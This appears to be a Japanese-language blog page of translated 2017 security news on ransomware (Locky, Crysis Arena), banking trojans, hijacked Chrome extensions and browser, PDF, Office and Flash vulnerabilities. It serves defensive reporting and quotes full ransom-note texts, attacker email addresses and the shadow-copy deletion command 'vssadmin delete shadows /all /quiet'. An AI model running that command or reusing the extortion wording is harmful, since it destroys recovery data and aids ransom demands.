    [FREE DECRYPTION AS GUARANTEE]

    Before paying you can send to us up to 3 files for free decryption.
    Please note that files must NOT contain valuable information
    and their total size must be less than 1Mb

    [HOW TO OBTAIN BITCOINS]

    The easiest way to buy bitcoin is LocalBitcoins site.
    You have to register, click Buy bitcoins and select the seller by payment method and price
    https://localbitcoins.com/buy_bitcoins

    [ATTENTION]

    Do not rename encrypted files
    Do not try to decrypt your data using third party software, it may cause permanent data loss
    If you not write on e-mail in 36 hours - your key has been deleted and you cant decrypt your files

    関連Email:

    tankpolice@aolonline.top
    edinstveniy_decoder@aol.com
    info@decrypt.ws


    MicrosoftはEdgeブラウザのコンテンツ・セキュリティ・バイパスの脆弱性をパッチしない
    The Register : Security (2017/09/07)
     Google, Apple, Microsoftのどれが、コンテンツ・セキュリティ・バイパスは、ブラウザへのパッチを必要としないと考えているのだろうか?
     今迄のChromeとSafariと現在のEdgeのバージョンに影響を与えるクロスサイト・スクリプティングのバグを発見したCisco Talosのセキュリティの仲間Nicolai Grodum(oは、oに/)のおかげで、我々は、その答えがMicrosoftであることを知った。
     Grodumは、あなたが、Chrome 57.0.2987.98及び、それ以降を使用している場合は、CVE-2017-5033に関しては既に保護されているとする説明付きで、コチラにMicrosoftの対応のニュースを投稿している。iOS 10.3より後のDittoユーザと、10.1より後のSafariユーザは、CVE-2017-2419の損害を無しで済ませられる。しかしながら、Tarosは、「Microsoftは、これは設計によるものであり、この問題をパッチしないと宣言した」と記述している。
     このバグは、ブラウザが攻撃者に以下を可能にする方法でabout:blankの取り扱いを誤ることにある。

    ・ インライン・スクリプト・コード("unsafe-inline"命令)を可能にするためにContent-Security-Policy(CSP)を設定する。
    ・ 新しいブランク・ウィンドウを開くためにwindow.open()を使用し、
    ・ ブランク・ウィンドウ・オブジェクトにコードを書き込むためにdocument.writeをコールする(CSP制限をバイパスする方法で)。

     悪用されると、攻撃者は、他のサイトにコンタクトするためにJavaScriptを使用することができる。そして。それはロードされたドキュメントと同一の生成元を持っているので、CSPに制限されることなく動作する。
     Tarosの説明として、CSPの仕様は、「制限は継承されなければならない」(生成元のページに適用されているあらゆる制限は、それから開かれたページに適用されなければならない)ことは明らかである。


    Windows Kernel中のバグはセキュリティソフトがマルウェアを同定することを妨げている
    BleepingComputer : News>Security (2017/09/07)
     マルウェア開発者は、悪意あるモジュールがランタイムにロードされた時、あるいは、ロードされた場合に、セキュリティソフトウェアの同定を妨げるためにWindows Kernel中のプログラミングエラーを乱用することができる。
     このバグはPsSetLoadImageNotifyRoutine(幾つかのセキュリティ・ソリューションが、コードがカーネルもしくはユーザスペースにロードされた時に、同定するために使用しているローレベル(【訳注】 Windowsシステムに最も近い層)・メカニズムの一つ)に影響を与える。
     この問題は、攻撃者がPsSetLoadImageNotifyRoutineが不正なモジュール名を戻してくる方法中にあるこのバグ(正当なオペレーションとしてマルウェアを装うことを攻撃者に可能にする)を悪用することができることにある。

    このバグは過去17年間にリリースされた全てのWindowsバージョンに影響する

     この問題は、enSilo社(【訳注】 サンフランシスコを本拠とするサイバーセキュリティ企業)の研究者が、Windows Kernelのコードを解析していた今年初めに光を当てられていた。Omri Misgav(enSiloの研究者で、この問題の発見者の一人)は、このバグがWindows 2000以降リリースされた全てのWindowsのバージョンに影響を与えると発言している。
     Misgavのテストは、このプログラムエラーが、最新のWindows 10のリリースにも生き残っていることを示している。
     Microsoftは、新しく登録されたドライバをアプリケーション開発者に、プログラム的に通知する方法としてPsSetLoadImageNotifyRoutine通知メカニズムを導入した。このシステムはPE(Portable Executableファイル・フォーマット)画像が、仮想メモリにロードされた時にも検出ができるので、このメカニズムは、悪意あるオペレーションの幾つかのタイプを検出するための方法としてアンチウィルス・ソフトウェアにも統合された。

    Microsoftは、これをセキュリティ問題として見做していなかった

     今まさに、この大問題は、セキュリティソフトウェアが悪意あるオペレーションの幾つかのタイプを検出するために、この方法に依存しているということにある。
     「我々は特に如何なるセキュリティソフトもテストしていない。我々は、幾つかのベンダが、このメカニズムを使用していることに気が付いているが、現段階では、バグのある[PsSetLoadImageNotifyRoutine]情報を使用した場合、あるいは、使用方法が、それらに影響を与えるか否か発言できない」と、MisgavはBleeping ComputerへのeMail中で発言している。
     「我々は、今年初めに、この問題に関してMSRC(Microsoft Security Response Center)にコンタクトした」と「彼らはセキュリティ問題として判断しなかった」と、MisgavはBleeping Computerに告げている。
     「幾つかのオンライン・リファレンスは、このバグが多少知られていたことを示しているが、我々が理解している限り、この問題の根源と完全な意味合いは、今迄詳細に説明されていない」と、この研究者は発言している。
     技術的な詳細に関しては、enSiloのブログポストが、PsSetLoadImageNotifyRoutineの動作方法と、このバグが標準(想定されている挙動)を変更する方法の細部を詳細に説明している。


    6年前の"loop bug"は、殆ど全てのメジャーなPDFビューアに影響を与えることが再発見された
    BleepingComputer : News>Security (2017/09/04)
     2011年に遡って世間ではあまり知られていないPDFパーサー ライブラリ中に発見されたバグは、今日最先端の大部分のPDFビューア中にも存在していると、ドイツのソフトウェア開発者Hanno Bock(Bockは、oにウムラウト)が伝えている。
     このオリジナルのバグは、Evince(Linux用のドキュメントビューア)を含むPDFパーサー コンポーネントに影響を与えた。このオリジナルのバグは、ドイツのソフトウェア開発者Andreas Bogk(Evinceを支援し、このフローを修正した者)によって発見され、2011年のChaos Communication Campで彼の発見は提示された。
     Bogkは、特定の構造(PDF files cross-referencing internal xref tables)が、ローカルCPUリソースの全てを奪い無限ループをEvinceアプリケーションに発生させ、素早くメモリを食い尽くし、Evinceアプリケーションをクラッシュさせることを発見した。
     このバグは、メジャーなセキュリティ問題と考えられることなく、Linuxデスクトップ上にインストールされた小さなアプリケーションだけが影響を受けると考えられ、殆ど無視されていた。

    6年前のバグは、一般的なPDFビューア中に再浮上した

     6年後、この問題は、Bockが多くの著名なPDFビューア中に類似の挙動を発見した後、大問題となった。
     例えば、Bockは、PDFium(Chromeが、あらゆるプラグイン無しで、ブラウザ内部にPDFドキュメントをレンダリングすることを可能にしているライブラリ)中にBogkの"loop"バグを発見した。
     pdf.jsライブラリ(Firefoxで類似機能のために使用される)もまた、影響を受ける。pdf.jsは、ユーザがPDFファイルをダウンロードし、サードパーティのアプリケーション内部にそれを表示する必要なく、Webサイトのインターフェース内部で、PDFドキュメントをレンダリングするためにGitHubでも使用されている。GitHubの実装もまた、そのサイト上でのPDFの表示を破壊し無限ループになる脆弱性が存在している。
     Windows Runtime PDF Renderer(WinRT PDF)もまた、影響を受ける。これはEdgeに組み込まれているPDFビューアであるが、また、Windowsの"Reader App"、Windows 8と全後継バージョンのDefault PDFビューアに関するDefault PDFパーサーでもある。
     GhostscriptQPDFのような類似のオープンソースPDFパーサーもまた影響を受ける。これは、この問題が十中八九これら二つのプロジェクトを配備している多くの他のWebとデスクトップPDFビューアに流れ落ちることを意味している。
     Bockは、影響を受ける全ての製品にこの古いバグを通知した。そして、彼らは今、パッチを当てる準備をしている。

    Adobe Readerは影響を受けない

      Adobe ReaderとApple OS X組み込みのPDFビューアは影響を受けない。
     この研究者は、彼が各プロジェクトを解析するためにファジング ライブラリを使用したと発言している。ファジングは、プログラムのアウトプット・レスポンスの例外を解析するために大量のランダムなインプット・データを与える基本的セキュリティ・テスト・テクニックである。Googleのセキュリティ・エキスパートは、ファジングの大ファンであり、彼らのアドバイスを聞くことに興味のあるあらゆる者に、このテクニックを推奨していた。
     Bockはまた、アップデートされたテスト・スーツを実行していないことに関して、影響を受けるプロジェクトの管理者を非難している。テスト・スーツは、PDFビューアがクラッシュすることなく開くことができなければならない疑わしいファイルのコレクションである。理想世界では、ソフトウェア開発者は、テスト・スーツを成功裡に通り抜けることなく、彼らのアプリケーションの新しいバージョンをリリースすべきではない。Bockは、彼らのテスト・ケースにBogkの"loop bug"デモファイルを追加するように推奨している


    巨大なLocky身代金要求型マルウェア キャンペーンは、24時間に2300万のeMailを送信していた
    GrahamCluley : Blog (2017/09/01)
     セキュリティ研究者は、24時間にLockyマルウェアを積んだ2300万のメッセージを送信した巨大マルウェアキャンペーンを注目していた。
     AppRiverのセキュリティ エキスパートは、8月28日米国東部時間07:00(日本時間 8月28日 22:00)にこのキャンペーンを検出した。このキャンペーンの攻撃eMailの内容は僅かであった。"download it here"の要求と共に"pictures" や "documents"のような無害のように見える件名程度である。


    AppRiverによって注目されたLocky攻撃eMailの一つ

     言うまでもなく、この添付ファイルを開くことにした受信者にとって良いことは何も発生しない。AppRiverのTroy Gillは、以下の点を明らかにしている

     「各メッセージは二つ目のZIPファイルを内部にネスト(入れ子)しているVisual Basic Script (VBS)ファイルを含むZIP添付ファイルを搭載している。クリックすると、VBSファイルは、最新のLocky身代金要求型マルウェアをダウンロードするためにgreatesthits[dot]mygoldmusic[dotcom]にアクセスするダウンローダを初期化する。Lockyは、ターゲット・システム上のファイルの全てを暗号化し、そのユーザの暗号化されたファイルに[.]lukitus拡張子を追加する。」

     暗号化のルーティーンが終了すると、Lockyは、.onionポータルにリンクした脅迫文を表示した。このサイトを訪問した犠牲者は、Locky Decryptorとして知られる「特別なソフトウェア」と引き換えに 0.5Bitcoin(凡そ 2,413.50 USD、24万円ほど)を支払うように求める脅迫文を見ることになる。


    Lockyマルウェア キャンペーンの .onionポータル

     このキャンペーン(最近の記憶の中では、Locky搭載eMailの突然の急増は、これだけではない)は、3時間の間に560万を超えるeMailが計測された。その総数は、翌日にまたがり、2300万を越える攻撃メッセージに跳ね上がった。
    Lockyには、姿を消し、そして何処からともなく現れるチョットした歴史がある。
     間違いなく、我々は、Lockyを真似て独自の株を作成する犯罪者は言うまでもなく、様々な寿命の身代金要求型マルウェアの脅威のを見るだろう。そうは言うものの、ユーザは今行動し、頑健なデータバックアップ計画を今策定し....、遅くなってしまう前に。
     彼らが身代金要求型マルウェアに攻撃された場合に、彼らが復元努力するために使用することのできる幾つかのヒントが此処にある。


    別のバンキング・トロイが、あなたの仮想通貨ウォレット(財布)を略奪しようとしている
    The Register : Security (2017/08/30)
     研究者達は、従来の口座の代わりに仮想通貨ウォレットを標的にするバンキング・トロイの新しい変種を発見した。
     Coinbase(最新のTrickbot変種のターゲットの一つである仮想通貨交換サイト)は、複数の仮想通貨を管理しているが、結果として、サイバー犯罪者が、そのアカウント証明を収穫することに成功した場合には、彼らが、乱用するための広汎なプラットフォームを提供することになっていた。情報セキュリティ企業Forcepoint Securityは、標的として、このトロイ(すでに、世界中の多くのプロバイダーの銀行口座を略奪しようとしている)に関する設定ファイルにCoinbaseを追加したと、レポートしている。
     サイバー犯罪者達は、作成以来、Trickbotを開発し続けており、その攻撃リストに新しい地方銀行(最も新しいところでは北欧)を追加し続けている。セキュリティ研究者達は最近、PayPalウォレットを標的にしたTrickbotキャンペーンを暴いている。
     デジタル通貨口座への切り替えは、Bitcoinや同類の支払い形式への人気に一致している。
     マルウェアを拡散しようとする怪しいメッセージは、Canadian Imperial Bank of Commerce(CIBC、カナダ帝国商業銀行)からの「安全なメッセージ」を装っている。ブービートラップされている添付ファイルは、最終的にTrickbotの変種をダウンロードし実行するマクロ・ダウンローダを匿っている。
     仮想通貨ウォレットを標的にしたマルウェアは珍しいが、前例がないわけではない。例えば、Dridexバンキング・トロイの変種は、昨年このルートを通った。2011年6月に遡るが、F-SecureはBitcoin WALLET.DATを検索するトロイを捕獲している。


    Arena Crysis身代金要求型マルウェアの新しい変種がリリースされた
    BleepingComputer : News>Security (2017/08/25)
     昨日、ID-RansomwareのMichael Gillespieは、暗号化したファイルに .arena 拡張子を追加するCrysis/Dharma身代金要求型マルウェアの新しい変種を発見した。この変種がどのように拡散しているのか正確には知られていないが、今まで、Crysisは、一般的にはRemote Desktop Services中に不正に侵入することで拡散してきた。
     この身代金要求型マルウェアがインストールされると、このマルウェアは特定のファイルタイプに関してそのコンピュータをスキャンし、それらを暗号化する。ファイルを暗号化すると、.id-[id].[email].arena の形式で拡張子を追加する。例えば、test.jpgと名付けられているファイルが暗号化されると、test.jpg.id-BCBEF350.[chivas@aolonline.top].arena にリネームされる。
     この身代金要求型マルウェアが、マップされているネットワークドライブと、アンマップ・ネットワーク共有を暗号化することに注意しておかなければならない。そこで、必ずあなたのネットワーク共有をロックしておき、実際にアクセスする必要のある人だけがパーミッションを持つようにしておくことが重要である。
     以下に、暗号化されたフォルダの例を示す。


    Crysis Arena身代金要求型マルウェアの変種で暗号化されたファイル

     コンピュータが暗号化されると、このマルウェアは、シャドウ・ボリューム・コピーの全てを削除するので、あなたはファイルの復元にシャドウ・ボリューム・コピーを使用することはできない。このマルウェアは、vssadmin delete shadows /all /quiet コマンドを実行することでシャドウ・ボリューム・コピーを削除する。
     Arena Crysis変種はまた、二つの脅迫文を作成する。一つは、info.hta ファイルであり、このファイルはautorunによって実行される。


    Crysis Arenaの脅迫文(クリックすると画像は拡大されます)

     もう一つの脅迫文は、FILES ENCRYPTED.txtと名付けられている。


    FILES Encrypted脅迫文

     これら二つの脅迫文は、支払いの指示を与えるために chivas@aolonline.top にコンタクトするための指示を含んでいる。
     最終的に、この身代金要求型マルウェアは、あなたがWindowsにログインした時、自動的に開始するように、それ自体を設定している。これはまた、最後に実行された後に作成された新しいファイルを、暗号化することも可能にしている。

    Crysis Arena身代金要求型マルウェアの変種で暗号化されたファイルを復号することは不可能

     残念ながら、この時点で、 Crysis身代金要求型マルウェアで暗号化された .arena ファイルを無料で復号することは不可能である。
     暗号化されたファイルを複合する唯一の方法は、バックアップからである。あるいは、あなたが恐ろしいまでに幸運であるのなら、シャドー・ボリューム・コピーからである。Crysisはシャドー・ボリューム・コピーを削除しようとするが、身代金要求型マルウェア感染は、稀に、何らかの理由から、これを実行することに失敗する場合がある。それ故、実行可能なバックアップを持っていない場合には、私は常に最後の手段としてシャドー・ボリューム・コピーから暗号化されたファイルの復元を試みるよう人々に提案している。
     Crysis身代金要求型マルウェアを論議したい、あるいはサポートを必要としている人々に関しては、我々の専用のCrysis Ransomware Help & Support Topicを使用することができる。

    Crysis身代金要求型マルウェアから自分自身を守るための方法

     Crysisから、あるいは、あらゆる身代金要求型マルウェアから自分自身を保護するためには、適切なコンピューター操作の習慣とセキュリティソフトウェアを使用することが重要である。何よりもまず、緊急の事態(身代金要求型マルウェア攻撃のような)に際して復元可能な、あなたのデータの信頼あるテスト済みのバックアップを常に持つようにすることである。
     あなたはまた、Emsisoft Anti-MalwareMalwarebytesのような挙動検知を含むセキュリティ ソフトウェアを持たなければならない。
     大事なことを言い忘れていたが、必ず、以下の適切なオンラインセキュリティ習慣を実践しなさい。これは多くの場合において、あらゆるものの中で最も重要なステップである。

    ・ バックアップ、バックアップ、バックアップ
    ・ 誰が送信したのかわからない場合、添付ファイルを開かないようにしなさい
    ・ その人が実際にあなたにそれらを送信したことを確認するまで添付ファイルを開かないようにしなさい
    ・ VirusTotalのようなツールで添付ファイルをスキャンしなさい
    ・ リリースされたら直ぐに、必ず全てのWindowsアップデートをインストールしなさい。また、全てのプログラム(特に、Java, Flash, Adobe Reader)を必ずアップデートしなさい。古いプログラムは、マルウェアの配布者によって一般的に悪用されているセキュリティ上の脆弱性を含んでいる。それ故、それらのプログラムをアップデートし続けることは重要である
    ・ 或る種のセキュリティソフトウェアをインストールし使用していることを確実にしなさい
    ・ 強力なパスワードを使用し、複数のサイトで同じパスワードを決して再使用しないようにしなさい
    ・ リモートデスクトップサービスを使用しているのなら、それを直接インターネットに接続しないようにしなさい。代わりに、VPNを介してだけそれにアクセスするようにしなさい

     身代金要求型マルウェア防御に関する完全ガイドに関しては、我々のHow to Protect and Harden a Computer against Ransomwareの記事を訪問しなさい。

    IOCs

    Hash
    ARENA SHA256: a683494fc0d017fd3b4638f8b84caaaac145cc28bc211bd7361723368b4bb21e

    Arena Crysis身代金要求型マルウェアのFILES ENCRYPTED.TXT脅迫文
    all your data has been locked us
    You want to return?
    write email chivas@aolonline.top

    Arena Crysis身代金要求型マルウェアのINFO.hta脅迫文
    All your files have been encrypted!
    All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail chivas@aolonline.top
    Write this ID in the title of your message [id]
    In case of no answer in 24 hours write us to theese e-mails:chivas@aolonline.top
    You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.
    Free decryption as guarantee
    Before paying you can send us up to 5 files for free decryption. The total size of files must be less than 10Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)
    How to obtain Bitcoins
    The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.
    https://localbitcoins.com/buy_bitcoins
    Also you can find other places to buy Bitcoins and beginners guide here:
    http://www.coindesk.com/information/how-can-i-buy-bitcoins/
    Attention!
    Do not rename encrypted files.
    Do not try to decrypt your data using third party software, it may cause permanent data loss.
    Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.


    FoxitがPDFリーダーをパッチすることを拒否した後、二つの0−Dayの脆弱性が明らかにされた
    GrahamCluley : Blog (2017/08/21)
     研究者達は、FoxitのPDF Readerのベンダが、そのセキュリティフローを修正する計画がないことを明らかにした後、Foxit PDF Readerに影響を与える二つの0-Dayを明らかにした。
     8月17日、責任ある公開(responsible disclosure)プログラムZero Day Initiative (ZDI)は、この研究者達が、Foxitの無料のPDF Reader中に発見したバグの公開に踏み切った。
     一つ目の脆弱性(CVE-2017-10951)は、このソフトウェアのapp.launchURLメソッドがシステムコールを実行する前に、ユーザによって提供された文字列を適切に認証していないことによるものである。
     Foxit PDF Readerの二つ目のバグ(CVE-2017-10952)は、ユーザ提供データの不適切な認証に起因しているが、それどころか、saveAs JavaScript関数に影響を与えている。
     上手く悪用されると、このフローのどちらも、リモート攻撃者が任意のコードを実行することを可能にする。
     ZDIのAriele Caltabianoは、2017年5月中旬に、この一つ目のフローを発見し、Offensive SecurityのSteven Seeleyは、6月の末近くに二つ目のバグを発見した。
     この二人の研究者は、120日の責任ある公開タイムラインに従い、その後直ぐにこの問題についてFoxitに接触した。しかし、彼らは、Foxitがこのバグを修正する意思がないことが明らかになった後まもなく、このフローを公開することを最終的に決定した。
     このベンダは、AusCERTに提供したステートメントで以下のように発言している。

     「Foxit ReaderとPhantomPDFは、JavaScriptの実行を制御するためにDefaultで有効になっているSafe Readingモードを持っている。そして、この機能は、認証されていないJavaScriptアクションが狙う潜在的な脆弱性を効果的に防御する」

     それはいいのだが、我々の多くは、毒性ペイロードの実行を可能にするために騙されて安全機能を無効化している世間知らずのユーザを見てきており、このような攻撃を嫌というほど知っている。
    Foxitは、真面目に、そして、適切に変更するように、その製品の安全対策を講じるためにデモされているパッチを使用することもできた。Foxit Readerユーザになろうとしたことがある人への、取り分け、過去のAdobeの脆弱性から逃走している間に、このソフトウェアを採用した人々に対して、何という歓迎の挨拶だ。
     FoxitをSafe Readingモードで実行していないユーザーにとっては、これは最初からのやり直しになると、私は推測している。
     他の非Adobe PDF Readerの一部に関しては、TechRadarのリストをチェックしなさい。あなたが、これらのオプションの一つを選ぶことを決定したのなら、必ず独自の調査をしなさい。その製品が適切なセキュリティ・レコードを持っており、あなたの必要性を満足させることを確認する前に、いかなるものもダウロードしてはならない。


    8つのChrome拡張がハイジャックされ、480万ユーザに悪意あるコードを配布していた
    BleepingComputer : News>Security (2017/08/16)
     昨日Proofpointの研究者Kafeineが明るみに出した新たな証拠によると、6人以上の開発者が、ここ4ヶ月間で彼らのChrome拡張をハイジャックされていた。
     今月初め、我々は、CopyfishWeb Developerと名付けられている二つのChrome拡張がハイジャックされていることについてレポートした。この二つの場合、攻撃者は開発者を欺くためにフィッシングeMailを使用し、開発者達のChromeアカウントのログイン認証を手にしていた。

    6つものChrome拡張がハイジャックされていた

     昨日、巧みな追跡の後、セキュリティ研究者Kafeineは、同じ手口でハイジャックされていた6つものChrome拡張を同定した。このリストは以下を含んでいる。

     8つの拡張全てに関する全インストール数を加算すると、攻撃者達は凡そ480万ユーザに彼らの悪意あるコードの配布を何とか達成していた。
     更に、Bleeping Computerはまた、二つの他のChrome拡張のオーナーに対する幾つかのフィッシング攻撃と、Chrome拡張開発者に対しフィッシング詐欺に目を光らせるように警告するeMailセキュリティ・アラートがGoogleによって送信されたことをレポートしている。
     全ての攻撃において、フィッシングがハイジャックプロセスの第一段階であるために、Googleは二週間前にeMailアラートを送信していた。このプロセスは継続し、その拡張のソースコード・レポジトリを乗っ取り、悪意あるコードを追加し、この拡張を再パッケージし、悪意あるコードを含むアップデートを押し付けていた。

    攻撃者は広告を置き換える(侵入型ポップアップ)ことに集中していた

     当初、このコードの解析は、大雑把なものであったが、我々は今、詳細な解析を持つことになった。幾つかのハイジャックされた拡張中に発見された悪意あるコードに関するKafeineの解析に感謝する。
     このProofpointの研究者によると、これらの拡張中に追加された悪意あるコードは、以下の操作を実行するために特別に細工されていた。

    ― ハイジャックされた拡張がインストールもしくはアップデートされた後、少なくとも10分待機する。
    ― ランダムにDGA(Domain Generation Algorithm。接続先ドメイン名生成)で生成されたドメイン(【訳注】 接続先ドメイン名生成の仕組みを利用して機械的に生成されたドメイン名で用意されたC&Cサーバ)からJavaScriptファイルを取得する。
    ― このユーザのブラウザからCloudflare(【訳注】 コンテンツデリバリーネットワークや分散型ドメイン名サーバシステムを提供するアメリカ合衆国の企業で、ウェブサイトにリバースプロキシを動作させることで閲覧者と自社ユーザーのホスティングプロバイダー間を取り持っている(Wikipediaより))認証を収穫する。
    ― 合法的サイト上の広告を、このハイジャッカーによって提供される広告に置き換える。
    ― 殆どの置き換え広告は、アダルトポータルサイトであり、33の正確なバナーサイズで行われている。
    ― エラーに関するユーザへの警告ポップアップを表示し、彼らを、トラフィック リダイレクト アフィリエイト プログラムの新しいWebサイトにリダイレクトする。

    攻撃者は2016年6月以来攻勢をかけている

     これら全ての行動は、攻撃者に少額の利益を得させていた。このフィッシングとハイジャック攻撃は、2017年5月に開始されたが、Kafeineは、2016年6月に遡り、クッキー同意型スクリプトを介して悪意あるコードの配布を発見された悪意あるChrome拡張に対してこれら複雑な操作に使用された基礎構造の一部をリンクした。
     これは、これらの攻撃の背後にいる実働部隊が、Chrome拡張とChrome Web Storeの両方の内部構造を熟知しており、ここ数週間で公になったにも拘わらず、十中八九彼らの作戦を継続することを示している。
     これらのChrome拡張のハイジャックが同じグループであるとする明確な証明はないが、これは単なる偶然の一致とすることはできない。上述の攻撃の全てが、同じグループもしくは個人により実行されたとする高い蓋然性は存在する。
     Kafeineによると、より悩ましいのは、このサイバー犯罪者がCloudflareの認証を収集したという事実である。そして、この研究者が確信していることは、攻撃者が将来の攻撃のための新しい方法と基礎構造を提供する可能性があるということである。


    Office脆弱性の悪用は、PowerPointのバリエーションとして新たな生命を得ている
    BleepingComputer : News>Security (2017/08/15)
     ここ数ヶ月に渡り、Officeの脆弱性は、脆弱性のあるコンピュータにマルウェアを拡散させるための最も人気のある効果的な方法の一つになっていた。
     この脆弱性(CVE-2017-0199として追跡される)は、今年4月にMcAfeeとFireEyeの従業員によって発見された。そして、これは発見された当初0−Dayの脆弱性であった。
     4月に、攻撃者は、彼らのターゲットにRTFファイル(このファイルが開かれると、OLE2linkオブジェクトを自動的に実行し、ユーザのマシンをセキュリティ侵害するために悪意あるコードを実行する)を配布するために、この脆弱性を使用した。。
     この時点で、攻撃者はHTAファイルをダウンロードし、次に、悪意あるJSコードを実行し、次に、様々なペイロードをインストールするために、このRTFファイルを使用した。研究者は、サイバースパイ・キャンペーンで、CVE-2017-0199がウクライナにおけるロシア支持の分離主義者を標的にするために使用されたことを確認しているが、平凡な金融マルウェア・キャンペーンでLatentbotバックドア トロイが配布されていたことも確認している。
     その後、この同じ脆弱性の悪用は、フィッシング用の悪意あるDOCファイルをスパムeMailすることでCerber身代金要求型マルウェアを配布するためにも使用された。

    攻撃者はCVE-2017-0199を使用し、無残にも失敗している

     昨日、CiscoとTrend Microは、サイバー犯罪者の間で、その人気を確認するために、この新しい脆弱性攻撃を使用している新たなキャンペーンに注目した。
     Ciscoによって注目されたこの攻撃は、CVE-2012-0158に2016年に最も人気のあった脆弱性であるCVE-2017-0199とを連結したグループによるものであった。
     Ciscoによると、このグループは、マルウェアをインストールするためにHTAファイルをダウンロードするこれまで通りのRTFドキュメントを配布するスパムキャンペーンを実行している。
     サイバー犯罪者は、Ramnitバンキング・トロイもしくはLokibot infostealer(【訳注】 侵入先のコンピュータから機密情報を収集する有害なソフトウェア(シマンテック日本より))の何れかを拡散させようとしていた。Ciscoの専門家は、ユーザに感染しようとする殆どの企ては失敗したと発言している。これは、ユーザのコンピュータが二つの脆弱性の何れもがパッチされていた場合、この感染の企ては失敗するからである。
     「この攻撃は失敗に終わった、これは、この攻撃者によるテストや品質管理手順が潜在的に貧弱であったことを示している」と、Cisco Talosチームは発言している。

    攻撃者はCVE-2017-0199を工夫して使っている

     CVE-2017-0199のこれらの新しい攻撃の最初の段階は、貧弱な実装であった。この第二段階は非常に創造的であった。そして、マルウェア開発者達は、このOfficeのフローを悪用する新たな方法を考えだした。
     Trend Microによって着目されたこれらの新しい攻撃は、同じCVE-2017-0199脆弱性を悪用していたが、RTFの代わりにPowerPoint PPTXファイルを介していた。攻撃者は、他のDOCファイルをダウンロードし、それを開き、Remcos RATをインストールするためにPPTXファイルを使用する。
     大多数の攻撃は、電子機器製造業関連企業を標的にしている。これは、この攻撃が、或る種の経済的なスパイ活動の一環であることを示唆している。
     「CVE-2017-0199用の殆どの検出方法は、RTFでの攻撃方法に着目しているので、新しい攻撃ベクトルの使用(PPSXファイル)は、攻撃者がアンチウィルスの検出を回避することを可能にする」と、Trend Microは発言している。
     Cybereasonはまた、Remcos RAT感染の急上昇を確認している。この企業は、ユーザのコンピュータ上にファイルを作成する方法と、RemcosによるユーザのPCの乗っ取りを防御する方法に関するガイドを一緒に置いている。
     Microsoftは、2017年4月の定例アップデートの一部としてCVE-2017-0199用のセキュリティ アップデートを発行している。


    最近パッチされたFlashのバグはWindows資格情報をリークする可能性がある
    BleepingComputer : News>Security (2017/08/11)
     今週初め、Adobeは、攻撃者が悪意あるFlashファイルを使用してWindows資格情報をリークすることができるFlash Player中の脆弱性をパッチした。
     このセキュリティ問題は、識別子CVE-2017-3085で追跡され、 Windows XP, Vista, 7, 8.x, 10で実行されているバージョン23.0.0.162 から 26.0.0.137のFlash Playerに影響を与える。

    以前の脆弱性に由来するフロー

     この脆弱性は、オランダのセキュリティ研究者Ruytenbergによって発見され、そして、Adobeが2016年9月にパッチしたCVE-2016-4271として追跡されていた以前のフローのバリエーションである。
     その当時、Ruytenbergは、彼が犠牲者を欺いてリモートSMBサーバにコールバックするFlashファイルをロードし、ユーザのコンピュータを欺いてその資格情報を奪うことができることを発見していた。
     Adobeは、Flash Player 23.0.0.162のリリースで、このフローをパッチした。このパッチは、UNC(Universal Naming Convention(汎用命名規則), 例: \\10.0.0.1\some\file.txt)やファイルシステム・パス(file://///10.0.0.1/some/file.txt)で、URLへのあらゆるアウトバウンド接続をFlashにさせないようにするものであった。
     Ruytenbergが発見した新しいバグは、Adobeの新しい防御手段をバイパスする巧妙な策略に依存している。この研究者のテクニカル・ブログ中の説明によると、攻撃者は、HTTPやHTTPSを介してリモートサーバへのリクエストを作成するFlashファイルをロードすることで、UNCやファイルパスURLに関するAdobeの禁令に適合することができる。
     悪意あるサーバの側からすると、攻撃者は、ローカルなNTLMハッシュ(ユーザの資格情報)を収集するために、従来通り、この同じテクニックを使用するSMBサーバーへ、この着信要求を中継するために古典的な302 HTTPリダイレクトを使用することができる。


    SMBtrap output

    攻撃はChromeやEdgeでは動作しない

     Ruytenbergは、Office(2010, 2013, 2016), Firefox, Internet Explorer中でFlashファイルがロードされた時だけ、この攻撃が動作すると発言している。ChromeやEdgeのようなブラウザは、この攻撃の影響を受けない。
     更に、この攻撃は、Flashの"remote"と"local-with-networking"サンドボックス(攻撃者がローカルデータを抽出することを防がなければならない二つのセキュリティ・セットアップ)を破る。
     「Flash Player 23は、非HTTP URLに関するあらゆるアウトバウンド・リクエストを拒否することによって潜在的な攻撃ベクトルを最小限にしている」とし、更に、「しかしながら、入力の正当性確認(input validation)は、一回だけしか実行されないので、初期のHTTPリクエストが確認されている間、連続的なリダイレクトは行われない」と、Ruytenbergは説明している。

    脆弱性は様々な方法で悪用される

     Bleeping ComputerへのeMailで、Ruytenbergは、より詳細に可能性のある攻撃のシナリオを明らかにしている。
     「この攻撃の複雑性は、大変低い。可能性のある攻撃のシナリオは以下を含む」と、この研究者は発言している。
      ・ Web: 悪意あるペイロードをFlashアプリケーションに供給している(セキュリティ侵害された可能性のある)Webサイトを訪問すること。これは、サードパーティーのドメイン(悪意ある広告者からのもののような)を含む。
      ・ eMail、Windowsファイル共有: 悪意あるFlashアプリケーションを埋め込んだローカルHTMLファイルを開くこと。このシナリオでは、Flashアプリケーションは、Defaultの"remote"サンドボックスに対立する"local-with-networking"中で実行することに注意しなさい(しかし、両方のサンドボックスは共に脆弱である)
      ・ Microsoft Office: WordとExcelドキュメントはFlashコードを埋め込むことを可能にしている。それ故、悪意あるコードは、Officeドキュメント中に埋め込まれ、次に、WebやeMailを介して拡散することが可能である。

    Severity評価が低くとも見くびってはならない

     この脆弱性は、CVSSのSeverityスコア4.3(10段階で)と評価されている。よく調べると、これは、あなたが悪意ある広告キャンペーンで見ている物のようには見えない。
     他方、このフローは、エコノミックや国家丸抱えサイバースパイ キャンペーンで見てきたような、特定の企業や個人を標的にした目標型攻撃にうってつけである。
     「厳密に、悪用された場合、リークされる情報は、Windowsユーザの資格情報に限定される。」と、更に、「しかしながら、これらの資格情報を保有されていることは、潜在的に大変有害である」と、RuytenbergはBleeping Computerに告げている。
